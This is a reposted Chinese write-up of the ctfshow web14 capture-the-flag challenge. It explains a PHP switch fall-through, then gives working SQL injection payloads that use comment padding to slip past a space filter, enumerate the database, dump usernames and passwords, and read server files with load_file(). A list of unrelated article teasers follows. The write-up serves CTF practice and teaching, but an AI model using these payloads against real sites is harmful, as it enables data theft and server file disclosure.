ctfshow_web14------（PHP+switch case 穿透+SQL注入+文件读取）

ctfshow_web14------（PHP+switch case 穿透+SQL注入+文件读取）

news/2025/9/12 13:08:03/文章来源:https://blog.csdn.net/hello_mszcc/article/details/151589010

题目：

解释：$c = intval($_GET['c']); //获取整数值 6

sleep($c);//延迟执行当前脚本若干秒。

提示一下哈没有break会接着执行下面的

但是像是44444，555555,sleep的时间太久

我们用3

进入here_1s_your_f1ag.php是一个查询页面，sql注入

查看源码

过滤的关键词有information_schema.tables，information_schema.columns，linestring，空格，polygon。

查字段数

爆库名

payload:query=-1/**/union/**/select/**/database()

爆表名

query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema='web'

爆列名

query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_schema='web'/**/and/**/table_name='content'

爆值

query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content

这里没有flag

有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中

如何读取???

mysql提供了读取本地文件的函数load_file()

要权限，用user()看一下权限是root可以用load_file()读

Wappalyzer 识别到 Nginx，网站默认根目录：/var/www/html/。

payload: ?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")/**/#

查看源码

真正的flag找到了

payload:?query=-1/**/union/**/select/**/load_file("/real_flag_is_here")/**/#

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。
如若转载，请注明出处：http://www.pswp.cn/news/922010.shtml
繁体地址，请注明出处：http://hk.pswp.cn/news/922010.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

linux x86_64中打包qt

linux x86_64中打包qt

下载安装地址: Releases linuxdeploy/linuxdeploy mv linuxdeploy-x86_64.AppImage linuxdeployqtchmod 777 linuxdeployqtsudo mv linuxdeployqt /usr/local/bin/linuxdeployqt --version报错 Applmage默认依赖FUSE，需要挂载自身为虚拟文件系统才能运行, ubuntu…

阅读更多...

华为昇腾CANN开发实战：算子自定义与模型压缩技术指南

华为昇腾CANN开发实战：算子自定义与模型压缩技术指南

点击 “AladdinEdu，同学们用得起的【H卡】算力平台”，注册即送-H卡级别算力，80G大显存，按量计费，灵活弹性，顶级配置，学生更享专属优惠。摘要随着人工智能技术的飞速发展，越来越多…

阅读更多...

Vue3源码reactivity响应式篇之reactive响应式对象的track与trigger

Vue3源码reactivity响应式篇之reactive响应式对象的track与trigger

概览在BaseReactiveHandler类的get方法中，有如下代码块if (!isReadonly2){track(target, "get", key);}，这表示通过reactive、shallowReactive创建的响应式对象，非只读的，当读取代理对象proxyTarget的某个属性key时&am…

阅读更多...

VRRP 多节点工作原理

VRRP 多节点工作原理

VRRP 多节点工作原理基本概念 VRRP 的设计初衷是给一组节点提供一个虚拟路由器，对外只表现出一个 VIP。协议规定：同一个 VRRP 实例下始终只有一个 Master 持有 VIP，其它全部是 Backup。 Master → 持有 VIP，负责转发流量到Mas…

阅读更多...

Gradio全解11——Streaming：流式传输的视频应用（9）——使用FastRTC+Gemini创建沉浸式音频+视频的艺术评论家

Gradio全解11——Streaming：流式传输的视频应用（9）——使用FastRTC+Gemini创建沉浸式音频+视频的艺术评论家

Gradio全解11——Streaming：流式传输的视频应用（9）——使用FastRTCGemini创建沉浸式音频视频的艺术评论家11.9 使用FastRTCGemini创建实时沉浸式音频视频的艺术评论家11.9.1 准备工作及音频图像编码器1. 项目说明及准备工作2. 音频和图像编码…

阅读更多...

Django入门笔记

Django入门笔记

Python知识点：函数、面向对象。前端开发：HTML、CSS、JavaScript、jQuery、BootStrap。MySQL数据库。Python的Web框架：Flask，自身短小精悍第三方组件。Django，内部已集成了很多组件第三方组件。【主要】1.安装djang…

阅读更多...

当Claude Code失灵，Qwen Code能否成为你的救星？

当Claude Code失灵，Qwen Code能否成为你的救星？

当Claude Code失灵，Qwen Code能否成为你的救星？ 一、开头：点明困境，引出主角作为一个大模型博主，日常工作中我经常会使用各种 AI 工具来提高效率，Claude Code 就是我之前非常依赖的一款代码生成助手。它…

阅读更多...

Go语言快速入门教程(JAVA转go)——1 概述

Go语言快速入门教程(JAVA转go)——1 概述

优势第一个理由：对初学者足够友善，能够快速上手。业界都公认：Go 是一种非常简单的语言。Go 的设计者们在发布 Go 1.0 版本和兼容性规范后，似乎就把主要精力放在精心打磨 Go 的实现、改进语言周边工具链，还有提升 Go …

阅读更多...

【Rust多进程】征服CPU的艺术：Rust多进程实战指南

【Rust多进程】征服CPU的艺术：Rust多进程实战指南

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯，先赞后看哦~🎈🎈 🏆 作者简介：景天科技苑 🏆《头衔》：大厂架构师，华为云开发者社区专家博主，…

阅读更多...

OpenCV 高阶实战：图像直方图与掩码图像深度解析

OpenCV 高阶实战：图像直方图与掩码图像深度解析

目录一、图像直方图：读懂图像的 “像素分布报告” 1. 什么是图像直方图？ 2. 图像直方图的核心作用 （1）分析亮度分布 （2）判断对比度高低 （3）辅助图像增强与阈值分割 &#xf…

阅读更多...

基于stm32的家庭安全监测系统设计

基于stm32的家庭安全监测系统设计

若该文为原创文章，转载请注明原文出处。一、引言（一）研究背景及意义背景：随着智能家居概念的普及，人们对家庭安全、舒适度和节能提出了更高要求。传统安防系统功能单一、各系统独立，缺乏联动和远程管理能力…

阅读更多...

Oracle体系结构-控制文件（Control Files）

Oracle体系结构-控制文件（Control Files）

一、原理 (Principle) 核心定位： 控制文件是一个小型的二进制文件，由 Oracle 实例在启动和操作过程中持续读写。它是数据库物理结构的权威记录。数据库无法启动或正常操作时，如果无法访问控制文件，实例将无法识别数据文件和重做日…

阅读更多...

路由下一跳网关两个不同网段的ip如何通过路由器互通

路由下一跳网关两个不同网段的ip如何通过路由器互通

路由 (Routing)核心思想：路径选择是什么？ 路由是指数据包从源主机传输到目标主机的整个过程。这个过程就像寄快递：你需要决定包裹经过哪些中转站才能最终到达收件人手里。做什么？ 网络中的设备（主要是路由器&#xff0…

阅读更多...

HiDDeN论文解读与代码实现

HiDDeN论文解读与代码实现

论文：HiDDeN: Hiding Data With Deep Networks 作者：Jiren Zhu, Russell Kaplan, Justin Johnson, Li Fei-Fei一、研究背景在图像信息隐藏领域，通常有两类典型的应用场景：隐写 (Steganography) 目标：实现秘密通信。要…

阅读更多...

实验室服务器配置｜实验室多人共享GPU｜通过Docker实现Linux系统多用户隔离与安全防控

实验室服务器配置｜实验室多人共享GPU｜通过Docker实现Linux系统多用户隔离与安全防控

利用实验室服务器跑实验的时候，通常就是两种方案，一个是向日葵远程桌面进行操作，一个是通过ssh进行连接，用ssh的话，一般服务器都在内网（例如校园网），是无法在公网（不在校…

阅读更多...

2019考研数学（二）真题

2019考研数学（二）真题

一、选择题 (1) (2) (3) (4) 遗漏点：由通解知特解，特解代入微分方程 (5) ★记住这个题，用的泰勒展开(6) (7) 遗忘点： ★伴随矩阵的秩与原矩阵秩的关系： (8) 错误点：粗心二、填空题 (9) 易混淆点&#xff…

阅读更多...

10 分钟上手 ECharts：从“能跑”到“生产级”的完整踩坑之旅

10 分钟上手 ECharts：从“能跑”到“生产级”的完整踩坑之旅

10 分钟上手 ECharts：从“能跑”到“生产级”的完整踩坑笔记如果你也曾复制了官方 Demo 却不知道怎么拆、窗口一拉伸图表就变形、切换标签页后内存暴涨——这篇博客就是为你写的。我会用 6 个递进版本的源码，带你把一张最简柱状图逐步进化成可销毁…

阅读更多...

二级缓存在实际项目中的应用

二级缓存在实际项目中的应用

二级缓存在项目中的应用目录 1. 二级缓存简介2. 应用场景3. 重难点分析4. 结合SpringBoot使用5. 最佳实践与案例6. 总结 1. 二级缓存简介 1.1 什么是二级缓存二级缓存（Second-Level Cache） 是Hibernate框架中的一个重要特性，它提供了应…

阅读更多...

深入浅出CRC校验：从数学原理到单周期硬件实现（2）CRC数学多项式基础

深入浅出CRC校验：从数学原理到单周期硬件实现（2）CRC数学多项式基础

数学的优雅：剖开CRC的多项式除法核心看似复杂的CRC校验，其核心建立在优雅的数学基础之上。本文将为您揭开CRC算法的数学面纱，让您真正理解多项式除法的精妙之处。模2运算：CRC世界的特殊算术 CRC计算建立在一种特殊的代数系统上——…

阅读更多...

软考初级有没有必要考？

软考初级有没有必要考？

对正在学习相关专业的学生或者是行业新人，这篇文章从软考初级的含义、适合哪些人考、考试难度等方面解答，帮助你判断要不要报考。一、软考初级是什么？ 软考初级是软考体系里面的基础级别，主要面向在校大学生或是IT行业新人&#x…

阅读更多...

最新文章